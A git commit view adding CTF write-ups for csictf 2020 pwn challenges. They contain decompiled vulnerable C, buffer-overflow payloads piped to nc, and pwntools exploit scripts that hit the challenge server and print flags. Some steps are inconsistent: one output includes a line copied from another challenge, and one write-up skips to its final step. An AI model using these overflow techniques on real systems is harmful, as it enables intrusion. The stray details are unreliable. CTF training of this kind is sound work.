rishitsaiya
4 years ago
11 changed files with 297 additions and 0 deletions
@ -0,0 +1,10 @@ |
|||||
|
## Global Warming |
||||
|
The main idea finding the flag is `%n` exploit. |
||||
|
|
||||
|
#### Step-1: |
||||
|
|
||||
|
https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{n0_5tr1ng5_@tt@ch3d}` |
@ -0,0 +1,84 @@ |
|||||
|
## Secret Society |
||||
|
The main idea finding the flag is Buffer Overflow. |
||||
|
|
||||
|
#### Step-1: |
||||
|
After I downloaded `secret-society`, I reversed it with IDA, I got this source code: |
||||
|
|
||||
|
**main()** function: |
||||
|
```c |
||||
|
undefined8 main(void) |
||||
|
{ |
||||
|
size_t sVar1; |
||||
|
undefined8 local_d8 [2]; |
||||
|
undefined4 uStack200; |
||||
|
undefined auStack196 [108]; |
||||
|
char local_58 [56]; |
||||
|
FILE *local_20; |
||||
|
char *local_18; |
||||
|
__gid_t local_c; |
||||
|
|
||||
|
setvbuf(stdout,(char *)0x0,2,0); |
||||
|
local_c = getegid(); |
||||
|
setresgid(local_c,local_c,local_c); |
||||
|
memset(local_58,0,0x32); |
||||
|
memset(local_d8,0,0x80); |
||||
|
puts("What is the secret phrase?"); |
||||
|
fgets((char *)local_d8,0x80,stdin); |
||||
|
local_18 = strchr((char *)local_d8,10); |
||||
|
if (local_18 != (char *)0x0) { |
||||
|
*local_18 = '\0'; |
||||
|
} |
||||
|
sVar1 = strlen((char *)local_d8); |
||||
|
*(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c; |
||||
|
*(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520; |
||||
|
*(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265; |
||||
|
auStack196[sVar1] = 0; |
||||
|
local_20 = fopen("flag.txt","r"); |
||||
|
if (local_20 == (FILE *)0x0) { |
||||
|
printf("You are a double agent, it\'s game over for you."); |
||||
|
/* WARNING: Subroutine does not return */ |
||||
|
exit(0); |
||||
|
} |
||||
|
fgets(local_58,0x32,local_20); |
||||
|
printf("Shhh... don\'t tell anyone else about "); |
||||
|
puts((char *)local_d8); |
||||
|
return 0; |
||||
|
} |
||||
|
|
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)` |
||||
|
|
||||
|
So I tried using Debugger to get the address of the flag. |
||||
|
|
||||
|
|
||||
|
```bash |
||||
|
echo flag > flag.txt |
||||
|
perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society |
||||
|
``` |
||||
|
|
||||
|
I got this output: |
||||
|
|
||||
|
```bash |
||||
|
What is the secret phrase? |
||||
|
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag |
||||
|
``` |
||||
|
|
||||
|
#### Step-3: |
||||
|
So, we just have to run this remotely on the web server. |
||||
|
|
||||
|
```bash |
||||
|
perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041 |
||||
|
``` |
||||
|
I got this output: |
||||
|
|
||||
|
```bash |
||||
|
What is the secret phrase? |
||||
|
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy} |
||||
|
``` |
||||
|
Voila! I got the flag there. |
||||
|
|
||||
|
#### Step-4: |
||||
|
Finally the flag becomes: |
||||
|
`csivit{Bu!!er_e3pl01ts_ar5_5asy}` |
@ -0,0 +1 @@ |
|||||
|
flag |
Binary file not shown.
@ -0,0 +1,53 @@ |
|||||
|
## pwn intended 0x1 |
||||
|
The main idea finding the flag is Buffer Overflow. |
||||
|
|
||||
|
#### Step-1: |
||||
|
I reversed the file with Ghidra. |
||||
|
|
||||
|
```c |
||||
|
undefined8 main(void) |
||||
|
|
||||
|
{ |
||||
|
char local_38 [44]; |
||||
|
int local_c; |
||||
|
|
||||
|
local_c = 0; |
||||
|
setbuf(stdout,(char *)0x0); |
||||
|
setbuf(stdin,(char *)0x0); |
||||
|
setbuf(stderr,(char *)0x0); |
||||
|
puts("Please pour me some coffee:"); |
||||
|
gets(local_38); |
||||
|
puts("\nThanks!\n"); |
||||
|
if (local_c != 0) { |
||||
|
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it."); |
||||
|
system("cat flag.txt"); |
||||
|
} |
||||
|
return 0; |
||||
|
} |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
Clearly, this was a case for Buffer Overflow. |
||||
|
|
||||
|
A simple command to overflow the buffer would give us the flag. |
||||
|
|
||||
|
`python -c 'print"A"*45' | nc chall.csivit.com 30001` |
||||
|
|
||||
|
<i> The piping done other way round doesn't help though. </i> |
||||
|
|
||||
|
Output: |
||||
|
|
||||
|
```bash |
||||
|
Please pour me some coffee: |
||||
|
|
||||
|
Thanks! |
||||
|
|
||||
|
Oh no, you spilled some coffee on the floor! Use the flag to clean it. |
||||
|
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r} |
||||
|
``` |
||||
|
|
||||
|
Voila! There we have our flag. |
||||
|
|
||||
|
#### Step-3: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}` |
Binary file not shown.
@ -0,0 +1,63 @@ |
|||||
|
## pwn-intended-0x2 |
||||
|
The main idea finding the flag is overwrite the correct hex after padding. |
||||
|
|
||||
|
#### Step-1: |
||||
|
After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code: |
||||
|
|
||||
|
```c |
||||
|
undefined8 main(void) |
||||
|
|
||||
|
{ |
||||
|
char local_38 [44]; |
||||
|
int local_c; |
||||
|
|
||||
|
local_c = 0; |
||||
|
setbuf(stdout,(char *)0x0); |
||||
|
setbuf(stdin,(char *)0x0); |
||||
|
setbuf(stderr,(char *)0x0); |
||||
|
puts("Welcome to csictf! Where are you headed?"); |
||||
|
gets(local_38); |
||||
|
puts("Safe Journey!"); |
||||
|
if (local_c == -0x35014542) { |
||||
|
puts("You\'ve reached your destination, here\'s a flag!"); |
||||
|
system("/bin/cat flag.txt"); |
||||
|
} |
||||
|
return 0; |
||||
|
} |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes. |
||||
|
|
||||
|
#### Step-3: |
||||
|
I wrote a very common `rev_exploit.py` to pwn into the machine. |
||||
|
|
||||
|
```python |
||||
|
import pwn |
||||
|
|
||||
|
r = pwn.remote('chall.csivit.com', 30007) |
||||
|
|
||||
|
payload = "A"*44 + '\xbe\xba\xfe\xca' |
||||
|
|
||||
|
r.sendline(payload) |
||||
|
r.interactive() |
||||
|
``` |
||||
|
|
||||
|
#### Step-4: |
||||
|
When I finally ran this `python3 rev_exploit.py`, I got this output: |
||||
|
|
||||
|
```bash |
||||
|
[+] Opening connection to chall.csivit.com on port 30007: Done |
||||
|
[*] Switching to interactive mode |
||||
|
Welcome to csictf! Where are you headed? |
||||
|
Safe Journey! |
||||
|
You've reached your destination, here's a flag! |
||||
|
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive |
||||
|
$ |
||||
|
[*] Interrupted |
||||
|
``` |
||||
|
Voila! I got the flag there. |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{c4n_y0u_re4lly_telep0rt?}` |
Binary file not shown.
@ -0,0 +1,10 @@ |
|||||
|
#!/usr/bin/env python3 |
||||
|
|
||||
|
import pwn |
||||
|
|
||||
|
r = pwn.remote('chall.csivit.com', 30007) |
||||
|
|
||||
|
payload = "A"*44 + '\xbe\xba\xfe\xca' |
||||
|
|
||||
|
r.sendline(payload) |
||||
|
r.interactive() |
@ -0,0 +1,76 @@ |
|||||
|
## pwn-intended-0x3 |
||||
|
The main idea finding the flag is overwrite the correct hex after padding. |
||||
|
|
||||
|
#### Step-1: |
||||
|
After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code: |
||||
|
|
||||
|
**main()** function: |
||||
|
```c |
||||
|
undefined8 main(void) |
||||
|
|
||||
|
{ |
||||
|
char local_28 [32]; |
||||
|
|
||||
|
setbuf(stdout,(char *)0x0); |
||||
|
setbuf(stdin,(char *)0x0); |
||||
|
setbuf(stderr,(char *)0x0); |
||||
|
puts("Welcome to csictf! Time to teleport again."); |
||||
|
gets(local_28); |
||||
|
return 0; |
||||
|
} |
||||
|
``` |
||||
|
|
||||
|
**flag()** function: |
||||
|
```c |
||||
|
void flag(void) |
||||
|
|
||||
|
{ |
||||
|
puts("Well, that was quick. Here\'s your flag:"); |
||||
|
system("cat flag.txt"); |
||||
|
/* WARNING: Subroutine does not return */ |
||||
|
exit(0); |
||||
|
} |
||||
|
``` |
||||
|
|
||||
|
#### Step-2: |
||||
|
I just had to write the address of the flag function after 32+8 bytes. |
||||
|
|
||||
|
So I tried using Debugger to get the address of the flag. |
||||
|
|
||||
|
```bash |
||||
|
echo into functions | gdb ./pwn-intended-0x3 | grep flag |
||||
|
``` |
||||
|
I got this output: `0x00000000004011ce flag` |
||||
|
|
||||
|
#### Step-3: |
||||
|
I wrote a very common `rev_exploit.py` to pwn into the machine. |
||||
|
|
||||
|
```python |
||||
|
import pwn |
||||
|
|
||||
|
r = pwn.remote('chall.csivit.com', 30013) |
||||
|
|
||||
|
payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00' |
||||
|
|
||||
|
r.sendline(payload) |
||||
|
r.interactive() |
||||
|
``` |
||||
|
|
||||
|
#### Step-4: |
||||
|
When I finally ran this `python3 rev_exploit.py`, I got this output: |
||||
|
|
||||
|
```bash |
||||
|
[+] Opening connection to chall.csivit.com on port 30013: Done |
||||
|
[*] Switching to interactive mode |
||||
|
Welcome to csictf! Time to teleport again. |
||||
|
Well, that was quick. Here's your flag: |
||||
|
You've reached your destination, here's a flag! |
||||
|
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive |
||||
|
$ |
||||
|
[*] Interrupted |
||||
|
``` |
||||
|
Voila! I got the flag there. |
||||
|
|
||||
|
#### Step-5: |
||||
|
Finally the flag becomes: |
||||
|
`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}` |
Binary file not shown.
Loading…
Reference in new issue